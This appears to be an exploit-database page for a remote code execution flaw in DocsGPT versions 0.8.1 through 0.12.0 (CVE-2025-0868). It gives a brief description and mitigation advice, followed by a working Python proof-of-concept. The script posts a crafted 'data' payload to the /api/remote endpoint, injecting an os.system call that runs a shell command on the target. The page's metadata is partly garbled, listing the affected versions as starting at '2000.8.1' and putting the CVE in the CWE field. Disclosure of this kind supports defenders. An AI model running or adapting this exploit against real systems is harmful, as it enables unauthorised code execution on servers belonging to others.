header-logo
Suggest Exploit
vendor:
DocsGPT
by:
Shreyas Malhotra
6.1
CVSS
HIGH
Remote Code Execution
RCE
CWE
Product Name: DocsGPT
Affected Version From: 2000.8.1
Affected Version To: 0.12.0
Patch Exists: NO
Related CWE: CVE-2025-0868
CPE: a:arc53:docsgpt:0.12.0
Metasploit:
Other Scripts:
Platforms Tested: Debian Linux, Ubuntu Linux, Kali Linux
2025

DocsGPT 0.12.0 – Remote Code Execution

The DocsGPT version 0.8.1 through 0.12.0 allows remote attackers to execute arbitrary code via a crafted HTTP request. An attacker can exploit this vulnerability by sending a malicious payload in the 'data' parameter, leading to the execution of arbitrary commands on the target system. This vulnerability has been assigned CVE-2025-0868.

Mitigation:

To mitigate this vulnerability, it is recommended to update DocsGPT to a patched version beyond 0.12.0. Additionally, input validation and sanitization should be enforced to prevent malicious payloads.
Source

Exploit-DB raw data:

# Exploit Title: DocsGPT 0.12.0 - Remote Code Execution
# Date: 09/04/2025
# Exploit Author: Shreyas Malhotra (OSMSEC)
# Vendor Homepage: https://github.com/arc53/docsgpt
# Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip
# Version: 0.8.1 through 0.12.0
# Tested on: Debian Linux/Ubuntu Linux/Kali Linux
# CVE: CVE-2025-0868

import requests
 
# TARGET CONFIG
TARGET = "http://10.0.2.15:7091"  # Change this
 
# Malicious payload string - carefully escaped - modify the python code if necessary
malicious_data = (
    'user=1&source=reddit&name=other&data={"source":"reddit",'
    '"client_id":"1111","client_secret":1111,"user_agent":"111",'
    '"search_queries":[""],"number_posts":10,'
    '"rce\\\\":__import__(\'os\').system(\'touch /tmp/test\')}#":11}'
)
 
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}
 
try:
    response = requests.post(f"{TARGET}/api/remote", headers=headers, data=malicious_data)
    print(f"[+] Status Code: {response.status_code}")
    print("[+] Response Body:")
    print(response.text)
except Exception as e:
    print(f"[-] Error sending request: {e}")

Navigation

Suggest Exploit

Services By CQR